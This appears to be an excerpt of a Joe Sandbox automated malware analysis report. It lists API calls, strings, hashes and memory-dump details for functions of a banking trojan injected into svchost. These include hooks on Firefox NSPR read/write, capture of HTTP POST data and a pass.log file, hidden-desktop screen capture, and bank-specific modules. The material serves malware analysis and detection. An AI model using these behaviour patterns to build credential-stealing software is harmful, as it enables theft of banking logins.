                                                                                                                                                                                                                    • String ID: PR_Close$PR_GetError$PR_GetNameForIdentity$PR_OpenTCPSocket$PR_Read$PR_SetError$PR_Write$nspr4.dll
                                                                                                                                                                                                                    • API String ID: 1577031324-943613760
                                                                                                                                                                                                                    • Opcode ID: e4b46da6d58aa288dc49034314960b9be425a9911dad82519c8391f5165aef91
                                                                                                                                                                                                                    • Instruction ID: 6d5524f4b433b16b8db29e1f5193a618bd92d53aeb5a8604d07816fc66f55455
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4b46da6d58aa288dc49034314960b9be425a9911dad82519c8391f5165aef91
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5017973BC536632B91336751C46FCB574D8EC1E48F0649B1F803B1944DBD5E1028879
                                                                                                                                                                                                                    Function 02C83EA0 Relevance: 27.1, APIs: 18, Instructions: 133memorynetworkCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000C10,76233050,762330D0,76233080), ref: 02C83EC7
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C83ECA
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C83EDE
                                                                                                                                                                                                                    • inet_addr.WS2_32(?), ref: 02C83F05
                                                                                                                                                                                                                    • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02C83F23
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83F2D
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C83F30
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83F3D
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C83F40
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000C13), ref: 02C83F58
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C83F5F
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C83F6F
                                                                                                                                                                                                                    • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02C83F85
                                                                                                                                                                                                                    • htons.WS2_32(00000000), ref: 02C83FB1
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 02C83FE1
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C83FE4
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 02C83FF4
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C83FF7
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$AllocFreeTableValidatememset$htonsinet_addr
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1718479325-0
                                                                                                                                                                                                                    • Opcode ID: 29477025ae6a1fe9aa3d15dd92cb163b7405cb1b7ee00adbba94e1da104d29ae
                                                                                                                                                                                                                    • Instruction ID: b88085a35273208d51dc973e77e834283b74a67b41c9b3ff78c4246472cfc672
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 29477025ae6a1fe9aa3d15dd92cb163b7405cb1b7ee00adbba94e1da104d29ae
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0241E332E40294ABDB21AF65DC48F9A7B78EF80B09F0185D4FD0497280DB72DA45CBE1
                                                                                                                                                                                                                    Function 02C84010 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 210stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C84060
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C8408C
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(02C93910,0000001C,0000001C), ref: 02C840B3
                                                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000005), ref: 02C840E4
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C8410D
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,Content-Length: ), ref: 02C84125
                                                                                                                                                                                                                    • StrToIntA.SHLWAPI(-00000010), ref: 02C84133
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000004), ref: 02C84165
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryVirtual$Readmemcpystrstr
                                                                                                                                                                                                                    • String ID: $Content-Length: $POST
                                                                                                                                                                                                                    • API String ID: 2509092961-2076583852
                                                                                                                                                                                                                    • Opcode ID: 98e3f5e6023505e43740f07631d97470b1c8b4de8df814408e7af2995d1372bf
                                                                                                                                                                                                                    • Instruction ID: 20fb5f77d205ca073ff0fd67f8c3b62ce2f308a28ed9b6ee4e61b5401f3d3b17
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98e3f5e6023505e43740f07631d97470b1c8b4de8df814408e7af2995d1372bf
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6718071D40256AFDB24EFA8DC84BAEBBB9FF88704F108669E814E7640D7309914CF91
                                                                                                                                                                                                                    Function 02C8CBC0 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 167stringthreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8CBE1
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,<L>,?,00000000,?), ref: 02C8CC19
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8CC4D
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8CC83
                                                                                                                                                                                                                    • PathFileExistsA.SHLWAPI(00000000,7F1BFC0D), ref: 02C8CCC9
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8A390,00000000,00000000,00000000), ref: 02C8CD48
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8CD60
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8CD71
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C8CD97
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,02C87A4D), ref: 02C8CDD4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashHandle$CloseCreateExistsFileInformationThreadmemcpymemsetstrstr
                                                                                                                                                                                                                    • String ID: 7F1BFC0D$<L>$POST$bsi.dll$pass.log
                                                                                                                                                                                                                    • API String ID: 4177962767-247644405
                                                                                                                                                                                                                    • Opcode ID: 9cc13a4ea0943cb3413a1a2afebb03ffea2db5b04c5cf6cf9bd6f23f5edbc480
                                                                                                                                                                                                                    • Instruction ID: 06d8eef77a4d09b74bfb68f91aa851fec4f1dbc0fe938ed8cc18d0de3af1fdc7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9cc13a4ea0943cb3413a1a2afebb03ffea2db5b04c5cf6cf9bd6f23f5edbc480
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC516F31D406455BD716BF34EC097E67BA9EF85308F14865BD80897280EB709B58CFE0
                                                                                                                                                                                                                    Function 02C8B888 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 162COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8B8A7
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8B8E1
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8B8EB
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8B8F3
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8B904
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8B90B
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 02C8B941
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8B980
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D,?,?), ref: 02C8B9C7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashDirectoryErrorLast$AdminAttributesCreateCurrentFileFolderMakeSystemUser
                                                                                                                                                                                                                    • String ID: 7F1BFC0D$\$ctunnel.zip$path_ctunnel.txt
                                                                                                                                                                                                                    • API String ID: 2545201083-3302986162
                                                                                                                                                                                                                    • Opcode ID: 0d24fdd9394c81d2c3d99d38b0d80c5c5f2a43102a1a27a606cbdb373f676f99
                                                                                                                                                                                                                    • Instruction ID: d0a2208008877b16d15c25a98c7cfc1f1bfd6b29ceef1f59d470caa040ab772e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d24fdd9394c81d2c3d99d38b0d80c5c5f2a43102a1a27a606cbdb373f676f99
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A51F6309046598FDB16DF24A858BE6BBF9EF86308F14C6D4D8C9D7211DB70DA89CB90
                                                                                                                                                                                                                    Function 02C783D0 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 84windowsynchronizationsleepCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetThreadDesktop.USER32(?), ref: 02C783E2
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: SelectObject.GDI32(00000000,00000000), ref: 02C77FCA
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: DeleteObject.GDI32(00000000), ref: 02C77FD9
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: DeleteDC.GDI32(00000000), ref: 02C77FE7
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: SelectObject.GDI32(?,00000000), ref: 02C77FF7
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: DeleteObject.GDI32(00000000), ref: 02C77FFF
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: DeleteDC.GDI32(?), ref: 02C78008
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: GetDC.USER32(00000000), ref: 02C7800C
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: CreateCompatibleDC.GDI32(00000000), ref: 02C7801B
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: CreateCompatibleDC.GDI32(00000000), ref: 02C78023
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02C78044
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: SelectObject.GDI32(?,00000000), ref: 02C78053
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02C7806E
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: SelectObject.GDI32(00000000,00000000), ref: 02C7808D
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: ReleaseDC.USER32(00000000,00000000), ref: 02C7809C
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000001F4), ref: 02C7840C
                                                                                                                                                                                                                    • GetTopWindow.USER32(00000000), ref: 02C7841B
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C78432
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000005), ref: 02C78448
                                                                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 02C7844B
                                                                                                                                                                                                                    • WindowFromPoint.USER32(?,?,00000000), ref: 02C7845F
                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,?,00000005,00000000), ref: 02C78481
                                                                                                                                                                                                                    • GetIconInfo.USER32(?,?), ref: 02C7848D
                                                                                                                                                                                                                    • DrawIcon.USER32(00000000,00000000,?,?), ref: 02C784AE
                                                                                                                                                                                                                    • DestroyIcon.USER32(?,?,?,00000000), ref: 02C784B5
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000,?,?,00000000), ref: 02C784C2
                                                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,?,00000000), ref: 02C784CF
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000032), ref: 02C784DB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Object$CompatibleCreateDeleteSelectWindow$Icon$BitmapReleaseSingleWait$DesktopDestroyDrawEventFromInfoMessageMutexPointSendSleepThread
                                                                                                                                                                                                                    • String ID: P0#v
                                                                                                                                                                                                                    • API String ID: 2294845507-3387790918
                                                                                                                                                                                                                    • Opcode ID: 8eaec09d3a492f721f1fd1a2e24dbb4a57badda49ef832711eca34dd661be69c
                                                                                                                                                                                                                    • Instruction ID: 0e43117837ab6268a9a67490fb1ba952dea540b34f6c08637e1ff143d0f09b8b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8eaec09d3a492f721f1fd1a2e24dbb4a57badda49ef832711eca34dd661be69c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A313674A80341AFC616EBB4EC8DF1B7769EB88711F008F98F61587280DA74E921CB60
                                                                                                                                                                                                                    Function 02C91AC8 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 56sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}), ref: 02C91ADC
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C91AED
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91B01
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C91B0F
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C91960,00000000,00000000,00000000), ref: 02C91B24
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40), ref: 02C91B35
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C91B3A
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91B4E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C91B5C
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf95c), ref: 02C91B67
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7f1bf95c,RSTYLE), ref: 02C91B81
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C91B8A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                                    • String ID: 7f1bf95c$Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$P0#v$RSTYLE
                                                                                                                                                                                                                    • API String ID: 505831200-2899104252
                                                                                                                                                                                                                    • Opcode ID: 9ea4946fda70028080132b8b51fdc5c838c3f5a54fca603538bd214f0df2f2f9
                                                                                                                                                                                                                    • Instruction ID: 87246e837453476ab8cb3a90fcf2ea0ea17a32e8c0ab618fc1457228210fe869
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ea4946fda70028080132b8b51fdc5c838c3f5a54fca603538bd214f0df2f2f9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0711E530AC47537BF7226B648C1FF1E37886F81B29F088644F919620C1EBF485008B67
                                                                                                                                                                                                                    Function 02C90B08 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 56sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C90B1C
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C90B2D
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C90B41
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C90B4F
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C909A0,00000000,00000000,00000000), ref: 02C90B64
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40), ref: 02C90B75
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C90B7A
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C90B8E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C90B9C
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf841), ref: 02C90BA7
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7f1bf841,RAIFF), ref: 02C90BC1
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C90BCA
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                                    • String ID: 7f1bf841$Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}$P0#v$RAIFF
                                                                                                                                                                                                                    • API String ID: 505831200-2004234703
                                                                                                                                                                                                                    • Opcode ID: 9d241e29066a7ccac0e2974def515aa8d1f14e992420dd3c3fa5b907d39e7cf9
                                                                                                                                                                                                                    • Instruction ID: 1bfc5cdfe3475c5b9873aec1f5fa2bb2d161855bd81734d9005c03239ff8d8f9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d241e29066a7ccac0e2974def515aa8d1f14e992420dd3c3fa5b907d39e7cf9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7811E530AC5752BEFB225B648C1FF1E37C86F80B19F108654F955A20C1EBB0D5008B67
                                                                                                                                                                                                                    Function 02C792B0 Relevance: 25.9, APIs: 17, Instructions: 354windowthreadtimeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetAncestor.USER32(00000000,00000002,00000080,?,00000000), ref: 02C792BE
                                                                                                                                                                                                                      • Part of subcall function 02C7D200: GetWindowLongA.USER32(?,000000F0), ref: 02C7D21B
                                                                                                                                                                                                                      • Part of subcall function 02C7D200: GetLastActivePopup.USER32(?), ref: 02C7D229
                                                                                                                                                                                                                      • Part of subcall function 02C7D200: GetWindow.USER32(00000000,00000005), ref: 02C7D243
                                                                                                                                                                                                                      • Part of subcall function 02C7D200: GetWindow.USER32(00000000), ref: 02C7D246
                                                                                                                                                                                                                      • Part of subcall function 02C7D200: GetWindowInfo.USER32(00000000,?), ref: 02C7D25C
                                                                                                                                                                                                                      • Part of subcall function 02C7D200: GetWindow.USER32(00000000,00000004), ref: 02C7D265
                                                                                                                                                                                                                      • Part of subcall function 02C7D200: GetWindow.USER32(00000000,00000003), ref: 02C7D29E
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 02C792FF
                                                                                                                                                                                                                    • GetAncestor.USER32(00000000,00000002,00000000), ref: 02C79385
                                                                                                                                                                                                                    • SendMessageTimeoutA.USER32(00000000,00000021,00000000,00000001,00000002,00000064,?), ref: 02C793AC
                                                                                                                                                                                                                    • PostMessageA.USER32(00000000,00000020,00000000,00000001), ref: 02C793F1
                                                                                                                                                                                                                    • PostMessageA.USER32(00000000,00000000,00000000,00000001), ref: 02C79445
                                                                                                                                                                                                                      • Part of subcall function 02C79160: GetTickCount.KERNEL32 ref: 02C791EA
                                                                                                                                                                                                                      • Part of subcall function 02C79160: GetClassLongA.USER32(00000000,000000E6), ref: 02C7923D
                                                                                                                                                                                                                    • PostMessageA.USER32(00000000,00000112,?,?), ref: 02C794AE
                                                                                                                                                                                                                    • PostMessageA.USER32(00000000,0000007B,00000000,?), ref: 02C794D9
                                                                                                                                                                                                                    • PostMessageA.USER32(00000000,0000007B,00000000,00000000), ref: 02C79555
                                                                                                                                                                                                                    • GetSystemMenu.USER32(00000000,00000000), ref: 02C79574
                                                                                                                                                                                                                    • GetMenuItemInfoA.USER32(00000000,0000F060,00000000,0000004C), ref: 02C79598
                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C79603
                                                                                                                                                                                                                    • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 02C79616
                                                                                                                                                                                                                    • PostMessageA.USER32(?,?,00000001,00000000), ref: 02C79639
                                                                                                                                                                                                                    • PostMessageA.USER32(?,?,00000002,00000000), ref: 02C7965B
                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02C79693
                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C796BD
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Message$Window$Post$ProcessThread$AncestorInfoLongMenuSend$ActiveClassCountItemLastPopupSystemTickTimeout
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 590198697-0
                                                                                                                                                                                                                    • Opcode ID: 109e73a09647cd5770d935d94549e2aa3c30c96d773e79d3f322b559c98ccc02
                                                                                                                                                                                                                    • Instruction ID: 28f0c27428ceba17d6f8045eb40a16bd936f8f5dabe40bbc738a6dc2b58ad52d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 109e73a09647cd5770d935d94549e2aa3c30c96d773e79d3f322b559c98ccc02
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80B15832F402146AEB219A69DC89FBF7B68E7C2714F00463AFD05971C1C7798A51DBA1
                                                                                                                                                                                                                    Function 02C7D680 Relevance: 25.1, APIs: 20, Instructions: 115memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,02C7EAE2), ref: 02C7D6A7
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7D6AA
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7D6B7
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7D6BA
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,02C7EAE2), ref: 02C7D6CA
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7D6CD
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7D6DA
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7D6DD
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,02C7EAE2), ref: 02C7D6ED
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7D6F0
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7D6FD
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7D700
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,02C7EAE2), ref: 02C7D710
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7D713
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7D720
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7D723
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(?,?,00000000,?,00000000,02C7EAE2), ref: 02C7D75D
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7D760
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(?,?), ref: 02C7D76C
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7D76F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
